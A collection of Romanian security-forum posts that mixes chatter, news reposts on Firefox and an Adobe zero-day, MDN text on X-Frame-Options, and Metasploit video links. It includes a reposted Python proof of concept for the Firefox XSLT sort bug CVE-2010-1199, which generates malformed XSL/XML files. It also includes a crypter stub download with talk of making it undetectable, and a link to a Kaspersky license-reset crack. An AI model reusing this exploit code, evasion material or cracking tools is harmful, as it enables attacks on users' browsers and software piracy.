Nytro

Exista optiunea: "Disable smilies in text"

Cel mai jegos site posibil. Astia copiau exploituri de pe milw0rm (sa nu mai spun ca au folosit un script asemanator) si ziceau ca sunt gasite de ei. Ratati. Abyssesc astia sunt chiar buni. In fiecare zi cate 2 buguri in aplicatii mari, cunoscute. Bine, am testat si eu cateva exploituri ale lor si nu au mers, si am inteles ca nu sunt singurul caruia nu ii merg.

Mai bine: http://www.exploit-db.com/archive.tar.bz2

Nu iti dau nici un ban pentru un bug. Poti scrie pe bugzilla despre el, sa il repare. Dau bani pentru probleme serioase de securitate, nu dau pentru orice mica prostioara.

Momentan exista multa lene. Trebuie sa termin un articol mai intai, apoi ziceam ca fac ceva pentru Linux. Voiam sa fac Stealer pentru Linux, dar nu se incadreaza in etica mea.

Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1 http://securitytube.net/Metasploit-Megaprimer-%28Exploitation-Basics-and-need-for-Metasploit%29-Part-1-video.aspx Metasploit Megaprimer (Getting Started with Metasploit) Part 2 http://securitytube.net/Metasploit-Megaprimer-%28Getting-Started-with-Metasploit%29-Part-2-video.aspx Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi) http://securitytube.net/Metasploit-Megaprimer-Part-3-%28Meterpreter-Basics-and-using-Stdapi%29-video.aspx Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv) http://securitytube.net/Metasploit-Megaprimer-Part-4-%28Meterpreter-Extensions-Stdapi-and-Priv%29-video.aspx Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito) http://securitytube.net/Metasploit-Megaprimer-Part-5-%28Understanding-Windows-Tokens-and-Meterpreter-Incognito%29-video.aspx Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts) http://securitytube.net/Metasploit-Megaprimer-Part-6-%28Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts%29-video.aspx Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation) http://securitytube.net/Metasploit-Megaprimer-Part-7-%28Metasploit-Database-Integration-and-Automating-Exploitation%29-video.aspx Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu) http://securitytube.net/Metasploit-Megaprimer-Part-8-%28Post-Exploitation-Kung-Fu%29-video.aspx Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation) http://securitytube.net/Metasploit-Megaprimer-Part-9-%28Post-Exploitation-Privilege-Escalation%29-video.aspx Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing) http://securitytube.net/Metasploit-Megaprimer-Part-10-%28Post-Exploitation-Log-Deletion-and-AV-Killing%29-video.aspx

Nu e bun, e de 2 ani cred, il detecteaza majoritatea, cred ca 80%. Oricum, cred ca nu ar fi foarte greu de facut FUD, PE Loader-ul e intr-un ActiveX care nuc red ca e prea detectabil. Dar nu ma mai ocup momentan cu asa ceva.

L-a postat cineva (dragon, thanks) pe ISR, nu stiu exact despre ce e vorba, am vazut doar ca se foloseste un stub al meu (de la Royal Crypter v1.0) . Screenshot: http://i54.tinypic.com/xfzx1x.png Download: http://www.multiupload.com/F07DE06966 Cum sa modifici un stub. Sa ne spuna mai multe cineva care stie assembly.

The X-Frame-Options response header O masura de precautie impotriva ClickJacking-ului. Sursa: https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header Introduced in Gecko 1.9.2.9 (Firefox 3.6.9) The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. Using X-Frame-Options There are two possible values for X-Frame-Options: DENY The page cannot be displayed in a frame, regardless of the site attempting to do so. SAMEORIGIN The page can only be displayed in a frame on the same origin as the page itself. In other words, if you specify DENY, not only will attempts to load the page in a frame fail when loaded from other sites, attempts to do so will fail when loaded from the same site. On the other hand, if you specify SAMEORIGIN, you can still use the page in a frame as long as the site including it in a frame it is the same as the one serving the page. Results When an attempt is made to load content into a frame, and permission is denied by the X-Frame-Options header, Firefox currently renders about: blank into the frame. At some point, an error message of some kind will be displayed in the frame instead. Browser compatibility [B]Browser Lowest version[/B] Internet Explorer 8.0 Firefox (Gecko) 3.6.9 (1.9.2.9) Opera 10.50 Safari 4.0 Chrome 4.1.249.1042 De vazut, interesant: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx

Vulnerabilitate 0-day in Adobe Reader – exploit semnat digital de Bogdan Condurache, 9 septembri O noua vulnerabilitate a fost descoperita in produsele Adobe Reader si Acrobat. Asa cum suntem instiintati de Roel, expert al Kaspersky Lab, aceasta vulnerabilitate este foarte exploatata. Unul din lucrurile care atrage atentia este tehnologia de programare ROP care ii permit sa treaca de protectia ASLR si DEP din Windows Vista si Seven. Majoritatea vulnerabilitatilor din fisierele PDF permit descarcarea de continut malitios. De aceasta data fisierul PDF contine codul malitios. Acesta creeaza un fisier executabil in directorul %temp% pe care va incerca sa il si execute. Ce este si mai interesant este ca fisierul este are semnatura digitala valida pana in 29 octombrie, a.c. Semnatura digitala apartine unei Cooperative de Credit din Statele Unite ale Americii si este semnat de VeriSign. Nu este prima data cand creatorii de malware se folosesc de semnaturile digitale furate pentru a semna exploit-uri. Sa ne amintim doar de Stuxnet. Sa speram ca stuxnet nu a insemnat “un nou trend” si ca semnarea digitala a malware-ului se va opri. Puteti inlocui adobe Reader cu PDF X-Change Viewer, Foxit PDF Reader sau Sumatra. Toate acestea fiind soft-uri gratuite, ultimul fiind open-source. Referinte: http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate Sursa: Vulnerabilitate 0-day in Adobe Reader - exploit semnat digital | WorldIT

KASPERSKY PURE Kaspersky PURE este superior oricarei solutii obisnuite de protectie a PC-ului. Acest produs ofera imunitate PC-ului tau in fata amenintarilor cibernetice de orice fel. Kaspersky PURE protejeaza integritatea si confidentialitatea tuturor bunurilor tale digitale. Kaspersky PURE iti pastreaza PC-ul curat si iti ofera linistea de care ai nevoie. Trial: http://trial.bestantivirus.ro/home_user/0_kpure/kaspersky_pure.zip KASPERSKY INTERNET SECURITY 2011 Aceasta solutie oferita de Kaspersky Lab imbina protectia unui antivirus cu un paravan de protectie personal si cu un filtru anti-spam. Kaspersky Internet Security iti protejeaza PC-ul impotriva spamului, a programelor periculoase de tip adware, spyware, dialers, precum si impotriva atacurilor de retea. Trial: http://trial.bestantivirus.ro/home_user/1_kis_2011/kaspersky_internet_security_2011.zip KASPERSKY ANTI-VIRUS 2011 Kaspersky Anti-Virus, nucleul sistemului de securitate al PC-ului tau, asigura protectie impotriva unei game largi de amenintari informatice si iti pune la dispozitie instrumentele de baza necesare pentru protectia PC-ului tau. Trial: http://trial.bestantivirus.ro/home_user/2_kav_2011/kaspersky_anti-virus_2011.zip KASPERSKY ANTI-VIRUS FOR MAC Compatibil cu Mac OS 10.6 Snow Leopard! Kaspersky Anti-Virus for Mac ofera protectie avansata pentru Mac-ul tau avand o interfata familiara utilizatorilor acestui sistem de operare si folosind tehnologii Kaspersky Lab premiate si patentate. Trial: http://trial.bestantivirus.ro/home_user/5_kav_for_mac/kaspersky_anti-virus_for_mac.zip KASPERSKY MOBILE SECURITY 9 Initiezi apeluri, trimiti mesaje text, navighezi pe Internet si comunici prin intermediul retelelor sociale in fiecare zi. Smartphone-ul este o parte importanta din viata ta. Kaspersky Mobile Security iti pastreaza datele doar pentru tine. Trial: http://trial.bestantivirus.ro/home_user/6_kms_9/kaspersky_mobile_security_9.zip KASPERSKY PASSWORD MANAGER Kaspersky Password Manager este un utilitar indispensabil pentru utilizatorul activ de Internet. Automatizeaza complet procesul de introducere a parolelor si a altor date in site-urile web si va scapa de efortul de a crea si a tine minte mai multe parole. Trial: http://trial.bestantivirus.ro/home_user/8_kpm/kaspersky_password_manager.zip KASPERSKY KRYPTOSTORAGE Kaspersky KryptoStorage iti protejeaza securizat fisierele personale impotriva accesului neautorizat si furtului de date folosind o tehnologie de ultima generatie pentru criptare transparenta, permitand stergerea permanenta a fisierelor din computer. Trial: http://trial.bestantivirus.ro/home_user/7_kks/kaspersky_kryptostorage.zip Sau de preferat descarcati de aici: http://www.kaspersky.com/trials Si am mai gasit asta (nu am testat, nu stiu daca e infectat...): This is the FINAL version of KTR911, you can reset your Kaspersky 2011/ Kaspersky 2010/ Kaspersky PURE anytime you want, even if your Kaspersky license is still valid, then you’ll get a fresh new license from Kaspersky Lab. Download: http://hotfile.com/dl/68124248/d1a2334/KTR.9.11.rar.html Sau: http://uploading.com/files/13e485dc/KTR.9.11.rar/

Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """<?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html"/> <xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle"> """ BlockCount = 43000 count = 1 while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n" count = count + 1 myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html> </xsl:template> </xsl:stylesheet> """ cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """<?xml version="1.0"?> <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?> <beatles> """ block = """ <beatle link="http://www.johnlennon.com"> <name> """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n" count = 1 while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n" myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1 myStyle = myStyle +""" </beatles> """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close() Sursa: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability In primul rand nu vad unde e Remote Code Execution. Poate DOS, asta da. Apoi .xsl-ul, nu mil-l deschide ci imi apare sa il descarc, probabil e necesar un Content-Type potrivit, dar nu ma chinui sa testez. Inca o chestie ciudata mi se pare ca nu imi omoara ambele procesoare (core-uri) simultan, ci "profita" de ele pe rand. Cand unul e la 100%, celalalt e la un nivel redus si invers. Imi place asta. Screenshot: http://i51.tinypic.com/23vzw60.png

Firefox Updated E un video acolo. Exemplu, cu si fara hardware acceleration.

Google Chrome vs. Firefox – care e mai tare în accelerare hardware? 08 septembrie 2010 | 15:05 Liviu Mihai Cel mai nou front de lupt? în r?zboiul browserelor este accelerarea hardware. Aceast? tehnologie, cum unii dintre voi cunoa?te?i deja, permite browser-ului s? foloseasc? puterea de procesare a pl?cii video, al?turi de procesorul sistemului. La ora actual?, browserele web abia încep s? ne arate poten?ialul acceler?rii hardware. Se fac teste ?i se experimenteaz?. Chrome ?i Firefox sunt browserele care suport? la acest moment accelerarea hardware, accelerare ce poate fi folosit? efectiv de utilizatori. Internet Explorer 9 promite ?i el o accelerare eficient? dar, deocamdat?, nu este disponibil pentru download. Din aceste considerente, putem testa accelerarea hardware doar în Chrome ?i Firefox. Trebuie s? ai Google Chrome 7 dev (sau Chromium) ?i s? activezi accelerarea hardware în acest fel. În cazul lui Firefox, trebuie s? ai instalat? versiunea lansat? ast?zi - beta 5 pentru versiunea 4, care poate fi desc?rcat de aici. În Firefox, accelerarea hardware este deja activat? în mod implicit. Testul Ironic, am testat poten?ialul acceler?rii hardware din Firefox ?i Google Chrome folosind testele create de Microsoft pentru a ne demonstra cât de bun este Internet Explorer 9. Cum IE9 nu este înc? disponibil, nici m?car beta, r?mâne pentru alt? dat? testarea lui. Test drive-ul creat de Microsoft poate fi accesat la aceast? adres?. Sunt disponibile trei categorii de teste: de vitez?, de HTML5 ?i de grafic?. Cum accelerarea hardware are ca scop cre?terea vitezei browser-ului, am ales un test de vitez?. Mai precis cel numit FishIE Tank. Rezultatele Testul a fost realizat cu ferestrele browserelor maximizate, cu 250 de pe?ti. Rezultatele au fost dup? cum urmeaz?: Firefox (rezolu?ie 1215 x 694 pixeli): în medie 40 FPS (frame-uri pe secund?) - aproximativ 27% gradul de înc?rcare al procesorului Chrome (rezolu?ie 1215 x 739 pixeli): în medie 5 FPS - aproximativ 50% gradul de înc?rcare al procesorului Se poate observa c? Firefox 4 beta 5, cu un grad de ocupare a procesorului la jum?tate fa?? de Google Chrome 7 dev, a ob?inut o performan?? de 8 ori mai bun? . De ?inut cont ?i de faptul c? rezolu?ia lui Google Chrome a fost pu?in mai mare (?ine de personalizarea interfe?ei). A?adar, Firefox reu?e?te s? redirec?ioneze mai eficient efortul de procesare c?tre placa video. Prin urmare, atât nivelul de înc?rcare al procesorului, cât ?i viteza de randare a fost mult superioar?. Cum am spus, ambele browser abia încep s? "se joace" cu accelerarea hardware. Nu este un test care s? eviden?ieze un rezultat clar. Este o situa?ie temporar?, care se poate schimba rapid. În plus, r?mâne de v?zut cum se vor comporta Internet Explorer 9 ?i Opera, când vor introduce aceast? facilitate. Pân? atunci, acest test scoate în eviden?? înc? un motiv, al?turi de altele, precum func?ia Panorama, pentru care Firefox 4 va reprezenta un upgrade important.

Nu cred ca va fi mai mare. Browser-ul va fi acelasi, adica acelasi suport va trebui sa il ofere, pentru toate prostioarele din HTML5 de exemplu. Daca e nevoie de cod in plus, sa faca si ei un fel de modul, sa fie incarcat doar cand e necesar.

Firefox 4 Set to Improve Security September 8, 2010 By Sean Michael Kerner The race to accelerate browser features continues as Mozilla developers race towards the finish line to get the finished version of the Firefox 4 Web browser out the door. The first Firefox 4 beta was released in early July of this year and the final release is due by the end of the year. Along the way to its final generally available release, Mozilla developers have been issuing milestone releases with new features and bug fixes. Firefox 4 development is occurring at a time when rival browser vendor Google (NASDAQ: GOOG) is updating it Chrome browser to version 6 and Microsoft is working on Internet Explorer 9. Firefox 4 Beta 5 is set to debut this week providing testers with new hardware accelerated graphics capabilities and an implementation of the IETF HTTP Strict Transport Security (HSTS) draft standard. "A while ago, we talked about Force-TLS that lets sites say 'hey, only access me over HTTPS in the future' and the browser listens," Mozilla developer Sid Stamm blogged. "Well, this idea has been solidified into a draft spec for HTTP Strict Transport Security (HSTS) and we’ve landed support for it into our source tree. This means that HSTS will be shipped with Firefox 4, and will be deployed as soon as the next beta release." The HSTS specification will enable site owners to ensure that browsers visit the SSL (define) secured version of a website instead of going through an unencrypted non-SSL HTTP address first. SSL secured sites help to ensure that password, login and other sensitive information is encrypted. "If Firefox knows your host is an HSTS one, it will automatically establish a secure connection to your server without even trying an insecure one," Stamm blogged. "This way, if I am surfing the 'net in my favorite cafe and a hacker is playing MITM with paypal.com (intercepting http requests for paypal.com and then forwarding them on to the real site), either I'll thwart the attacker by getting an encrypted connection to paypal.com immediately, or the attack will be detected by HSTS and the connection won't work at all." What will Firefox 4 Include – and leave out? While the Beta 5 release includes new features, the final feature freeze for Firefox 4 is likely coming soon. A number of features that were originally set for inclusion of Firefox 4 have already been dropped including a new Account Manager tool. On Mozilla's platform wiki, the open source organization has also noted in its latest meeting notes that new Windows silent updating feature may be at risk from being dropped from the final release. The silent update feature is one that is intended to run in the background and update the Firefox browser as new security releases come out. With Beta 5 out the door, Mozilla developers are turning their attention to Beta 6 which is currently scheduled for a code freeze on Friday September 10th. During a conference call on Tuesday, Mozilla's director of Firefox, Mike Beltzner noted that there are currently 114 blockers (items still to be fixed and/or completed) and as such he's not sure that the September 10th date for a Beta 6 code freeze will be achievable. "I would also like to avoid a repeat of landing particularly risky changes right before a code freeze, which is what happened with Beta 5," Beltzner said. "As a result, Beta 5 will ship with some drawing regressions, especially on Mac."

Mozilla Labs Launches Gaming Initiative Sep 08, 2010 Platform based on open Web technologies. Mozilla Labs announced its newest initiative, a gaming platform appropriately named Mozilla Labs: Gaming. The goal of the platform is to create browser-based games built on Open Web standards. "We invite the wider community to play with cool, new tech and aim to help establish the Open Web as the platform for gaming across all your Internet connected devices," Pascal Finette from Mozilla Labs said. Some of the technologies Mozilla Labs Gaming utilizes include webGL, touch controls, geolocation, Javascript, and open video and audio. Games built on HTML5 are available freely on sites like HTML5games.com, but with Mozilla's new initiative looks to advance games. Mozilla Labs Gaming is also launching an international gaming competition to drive developer interest to the burgeoning platform. Aptly titled Game_On 2010, the competition will open at the end of September. (Trevan McGee)

Sean Michael Kerner Wednesday, September 8, 2010 11:14:55 AM Recent years have seen the Ubuntu Linux distribution, led by Canonical, experiencing rapid growth in both users and features. With the upcoming Ubuntu 10.10 Maverick Meerkat release, set for October, Ubuntu developers will continue to push the boundaries further of both server and desktop Linux. Sitting at the upper rung of Ubuntu's engineering efforts is Matt Zimmerman, Canonical's CTO, who helps to lead Ubuntu's technical direction. That's no small feat: Keeping the project and its developers organized is a mammoth undertaking, requiring the daily coordination of activities across the globe. But as Zimmerman describes it, he has the tools and processes in place to keep the Ubuntu project running strong. One way that Zimmerman keeps the project on track is ensuring close communication among members of his team, a disparate organization that mirrors how the Ubuntu community itself builds and develops its Linux distribution. For one thing, While Canonical has offices in multiple countries, most of Zimmerman's engineers aren't located in those offices. "My team is about 120 people and I think we have less five people who are in offices," Zimmerman told InternetNews.com. While Zimmerman noted that he does get together face-to-face fairly regularly with his staff once a quarter, facilitating regular interaction requires a long list of common tools. For instance, Zimmerman said that Canonical engineers do a lot of work through IRC , wikis and teleconferences. The team also uses the open source Gobby tool for collaborative editing and Mumble for voice chatrooms. "Mumble is sort of like IRC for voice," Zimmerman said. "You have a set of channels and then people come and go from one channel to another and whatever channel you're in, there is live voice between the people that are in the room." Engineering organizations are often big users of whiteboards to build and share ideas, and Ubuntu is no exception. While his staff and contributors are distributed, Zimmerman said that they do rely on some desktop and screen-sharing, though he added that there isn't a one-to-one whiteboard substitute. For overall project and goal management, Canonical is using its own Launchpad platform. "Launchpad provides some basic project management support," Zimmerman said. "We've developed other tools around that for tracking." Zimmerman described the project's overall management as using a blueprint -- a project plan on which individual tasks are broken out. Canonical also has a tool that extracts data out of Launchpad and does reporting. One of the key reporting elements used by Zimmerman is a burn-down chart, an important element of the Scrum agile software development methodology. "It's basically a bar chart that shows you how much work you have remaining to do in your iteration," Zimmerman said. "So if you start off with, say, 200 tasks, you then draw it down to zero and you track it as you go if you're above or below the trend line." Though Zimmerman is using a Scrum-style burn-down chart to track project progress, he added that he isn't strictly adhering to any one particular development methodology. "We're using bits and pieces of different methodologies," Zimmerman said. "We use some components from Extreme Programming (XP), Scrum, and others. Different engineering teams have different requirements so we're experimenting with different approaches." From an accounting perspective, however, Zimmerman noted that by using elements of the Scrum approach, he is able to report on the output capacity of his team. "So we know in this amount of time how much we are able to get done and that enables more accurate forecasting," Zimmerman said. From a testing perspective, the Ubuntu engineering organization has multiple efforts underway. Zimmerman explained that hardware certification testing occurs in a hardware lab where daily, automated compatibility testing occurs. There are also automated functional tests to ensure that users can upgrade cleanly from one release to another. Then there is also manual testing, which is crowdsourced by the Ubuntu community. Ubuntu developers don't operate in a vacuum and are part of the broader upstream open source ecosystem. As a result, patches and contributions are made upstream by Zimmerman's team in an ongoing process. Sometimes, Ubuntu will have patches that have not yet been merged upstream. "We do carry patches on top of upstream, but we have to in order to meet our deadlines," Zimmerman said. "Our goal is to keep the delta as small as we can. Every release cycle, we spend a good amount of our engineering time bringing our patch set forward." Ubuntu also relies heavily on its relationship with the Debian Linux distribution, and Zimmerman noted that the vast majority of Ubuntu patches submitted to Debian are accepted. He added that with other upstream projects, where Ubuntu doesn't do as much work, there can be challenges. "It's tough since we have to work across so many different projects with Ubuntu," Zimmerman said. "We can't have a close personal relationship with everyone in the open source community, but at the same time, we've got to be able to work together."

Inca un ban. Multi ratati pe aici. Un fisier se inchidea imediat dupa rulare, ascundea fisierele ascunse, bloca task manager. Nu am stat sa verific mai multe.

Greerasu nu poate veni, nu e in Romania. Da-mi ID-ul tau pe MP.

Lasati complimentele. Deci, cine e din VL si da de baut?

Nu ruleaza pe masina virtuala, se inchide imediat la rulare, deci ban

Mi-a venit si mie update-ul pentru asta de la OpenSUSE. Avantajul open-source-ingului... Si mi-au venit mai multe update-uri de securitate pentru kernel, faceti update.

E de la rewrite 1337 e ID-ul acelui topic.

Dai de baut? 2-3 beri acolo.